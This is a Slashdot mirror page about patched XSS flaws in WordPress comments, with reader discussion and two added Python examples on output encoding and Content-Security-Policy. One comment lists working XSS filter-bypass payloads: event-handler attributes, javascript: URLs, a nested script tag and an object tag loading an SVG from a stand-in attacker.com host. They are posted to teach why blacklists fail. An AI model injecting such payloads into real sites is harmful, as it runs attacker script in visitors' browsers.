Slashdot Mirror


Critical XSS Flaws Patched In WordPress and Popular Plug-In

itwbennett writes The WordPress development team on Thursday released critical security updates that address an XSS vulnerability in the comment boxes of WordPress posts and pages. An attacker could exploit this flaw to create comments with malicious JavaScript code embedded in them that would get executed by the browsers of users seeing those comments. 'In the most obvious scenario the attacker leaves a comment containing the JavaScript and some links in order to put the comment in the moderation queue,' said Jouko Pynnonen, the security researcher who found the flaw.

6 of 41 comments

  1. Re:Regular expressions by Spy+Handler · · Score: 2

    Wouldn't simply stripping out "
    Like, whatever the user posted doesn't have to look properly formatted or anything, he's trying to inject malicious javascript... the Wordpress site owner will be deleting the comment as soon as it's discovered, right?

  2. Re:There's a solution by Dracos · · Score: 2

    The real question is, Why is anybody still running WordPress?

  3. Re:Regular expressions by cbhacking · · Score: 4, Interesting

    <img src="xss" onerror="alert('Nope!')" />
    <iframe src="javascript:alert('That won't work.')"></iframe>
    <object data="http://attacker.com/SvgCanContainScriptsAndCanUseTheParentObjectToAttackTheHostingPage.svg"></object>
    <scri<scriptpt>alert("In fact, that kind of blacklisting is trivial to bypass.");</script>
    <form action="javascript:alert('I once spent a month breaking a client's blacklist every time they updated it to block my last POC exploit, telling them all the while they had to use output encoding.');"><input type="submit" value="SPOILER" /></form>
    <h1 onmouseover="alert('They eventually did, but oh man did they waste a lot of time trying variants on your suggestion first!')">REALLY BIG TEXT THAT YOUR MOUSE WILL GO OVER</h1>

    People thinking like you do frequently leads to exactly this sort of problem, where something *supposedly* has XSS protection but in fact totally doesn't. With the possible exception of the nested script tags (if you're smart enough to run the filter repeatedly until no further hits occur, that'll be caught), every single one of these lines will execute arbitrary attacker-controlled JavaScript through the filter that you propose. I strongly recommend that you go read OWASP, especially the top 10, and in the meantime I hope you haven't written any in-production web applications...

    --
    There's no place I could be, since I've found Serenity...

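
The contrast cbhacking draws between a tag blacklist and output encoding, as an added example that is not part of the thread or of WordPress: the blacklist is modelled as deleting the string `<script` (the filter the nested-tag line above is built to defeat), once and then repeatedly, and the sample comments are constructed stand-ins for two of the payload shapes in the comment. Every function name here is an assumption of this example.

```python
import html
import re

# Constructed sample inputs modelled on the payloads in the comment above:
# an event-handler attribute (no <script> tag at all) and the nested tag trick.
SAMPLE_COMMENTS = [
    '<img src="xss" onerror="alert(1)" />',
    '<scri<scriptpt>alert(1)</script>',
    'Normal comment with <b>bold</b> & an ampersand',
]

# The blacklist being argued against: delete the string "<script" wherever it appears.
SCRIPT_OPEN = re.compile(r"<script", re.IGNORECASE)


def naive_strip_script(comment: str) -> str:
    """Single-pass blacklist filter. Leaves everything that is not a <script tag alone."""
    return SCRIPT_OPEN.sub("", comment)


def strip_until_stable(comment: str) -> str:
    """The 'run the filter repeatedly' variant conceded in the comment: loop until no hits.
    Closes the nested-tag hole only; event handlers still pass through untouched."""
    previous = None
    while previous != comment:
        previous, comment = comment, SCRIPT_OPEN.sub("", comment)
    return comment


def encode_for_html_text(comment: str) -> str:
    """Output encoding: <, >, &, " and ' become entities, so the browser renders the
    comment as literal text and never parses any part of it as markup."""
    return html.escape(comment, quote=True)


def has_tag(rendered: str) -> bool:
    """Rough tag detector for the demonstration: a '<' followed by a tag-name letter
    is something the HTML parser will turn into an element."""
    return re.search(r"<[A-Za-z]", rendered) is not None


def compare(comments=SAMPLE_COMMENTS) -> dict:
    """For each sample, report whether each approach still leaves parseable markup."""
    return {
        c: {
            "naive_strip": has_tag(naive_strip_script(c)),
            "strip_until_stable": has_tag(strip_until_stable(c)),
            "output_encoding": has_tag(encode_for_html_text(c)),
        }
        for c in comments
    }


if __name__ == "__main__":
    for comment, result in compare().items():
        print(repr(comment), result)
```

The point the table makes: both blacklist variants report `True` (markup survives) for the `onerror` sample, because a filter that looks for one tag name has nothing to say about attributes on any other tag, while encoding reports `False` for every input regardless of what the attacker chose, which is why it is the fix rather than a longer blacklist.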
  4. Content Security Policy by Njovich · · Score: 2

    One highly underused technology is the Content Security Policy. It is supported in all major browsers, including IE10+.

    With simple headers you can prevent anyone from using inline javascript or including scripts from non-whitelisted domains. For instance, the following headers would make inline scripts not execute, and only execute javascript from the whitelisted domains:

    Content-Security-Policy: script-src 'self' www.google-analytics.com ajax.googleapis.com;
    X-Content-Security-Policy: script-src 'self' www.google-analytics.com ajax.googleapis.com;

    If projects like Wordpress would pick this up, it would make it very difficult to do XSS attacks.
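
How a browser would apply the header quoted in this comment, as an added example that is not part of the thread or of any browser's code: a simplified Content-Security-Policy evaluator that parses the directive list and decides whether an inline script or a script URL may run. It models `'self'`, `'unsafe-inline'`, `'none'`, `*`, host sources (with optional scheme, port and `*.` prefix) and the `default-src` fallback; nonces, hashes and `'strict-dynamic'` are deliberately left out, and the page URLs, the `WEAK_POLICY` variant and all function names are constructed assumptions.

```python
from urllib.parse import urlsplit

# The policy quoted in the comment above (the X-Content-Security-Policy header
# is the legacy prefixed form of the same value and parses identically).
STRICT_POLICY = "script-src 'self' www.google-analytics.com ajax.googleapis.com;"
# Constructed weak variant for comparison: 'unsafe-inline' hands back exactly the
# inline-script execution that the strict policy takes away.
WEAK_POLICY = "script-src 'self' 'unsafe-inline' www.google-analytics.com ajax.googleapis.com;"


def parse_csp(header_value: str) -> dict:
    """Split a CSP header into {directive_name: [source_expressions]}."""
    policy = {}
    for directive in header_value.split(";"):
        tokens = directive.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def _host_source_matches(source: str, script) -> bool:
    """Match one host-source expression (optional scheme, optional '*.' prefix,
    optional port) against a parsed script URL. Path matching is not modelled."""
    scheme = None
    rest = source
    if "://" in source:
        scheme, rest = source.split("://", 1)
    host, _, port = rest.split("/", 1)[0].partition(":")
    host = host.lower()
    if scheme and scheme.lower() != script.scheme:
        return False
    if port and port != "*" and str(script.port) != port:
        return False
    script_host = (script.hostname or "").lower()
    if host.startswith("*."):
        return script_host.endswith(host[1:])  # "*.googleapis.com" -> ".googleapis.com"
    return script_host == host


def script_allowed(header_value: str, page_url: str, script_url: str = None) -> bool:
    """Decide whether a script may run under the policy.

    script_url=None means an inline <script> block or an on* handler attribute,
    which is the case the XSS in the story relies on.
    """
    policy = parse_csp(header_value)
    sources = policy.get("script-src", policy.get("default-src"))
    if sources is None:
        return True  # no governing directive: the browser blocks nothing
    if script_url is None:
        return "'unsafe-inline'" in sources
    if sources == ["'none'"]:
        return False
    page, script = urlsplit(page_url), urlsplit(script_url)
    same_origin = (script.scheme, (script.hostname or "").lower(), script.port) == (
        page.scheme, (page.hostname or "").lower(), page.port)
    for source in sources:
        if source == "'self'":
            if same_origin:
                return True
        elif source == "*":
            return True
        elif source.startswith("'"):
            continue  # other keyword sources never match a URL
        elif _host_source_matches(source, script):
            return True
    return False


if __name__ == "__main__":
    page = "https://blog.example/post"
    for name, policy in (("strict", STRICT_POLICY), ("weak", WEAK_POLICY)):
        print(name, "inline:", script_allowed(policy, page, None),
              "same-origin:", script_allowed(policy, page, page + "/a.js"),
              "cdn:", script_allowed(policy, page, "https://ajax.googleapis.com/a.js"),
              "other host:", script_allowed(policy, page, "https://other.example/a.js"))
```

Under the strict policy an injected comment's inline `alert(...)` or `onerror=` handler is refused while the site's own scripts and the two listed CDNs still load; adding `'unsafe-inline'`, which sites often do to keep legacy inline code working, is the single change that reopens the door.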

  5. Re:There's a solution by drinkypoo · · Score: 3, Insightful

    The real question is, Why is anybody still running WordPress?

    Because Drupal has security flaws, too.

    Not everyone wants to write their own CMS and deal with the security issues. Wordpress probably is the absolute worst choice, though.

    --
    "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"

  6. Re:There's a solution by Zedrick · · Score: 4, Insightful

    Because it's very easy to use for people with their own domain but little tech knowledge, it has a massive amount of themes and plugins to choose from (which I admit can be a problem) and it has far fewer security issues than any comparable CMS.

    I've worked with hosting abuse for a long time, and it's fairly rare to see a hacked WP nowadays - unless the owner of the site has turned off auto-updating. Hacked Joomla-, modX- or Drupal-sites are much more common.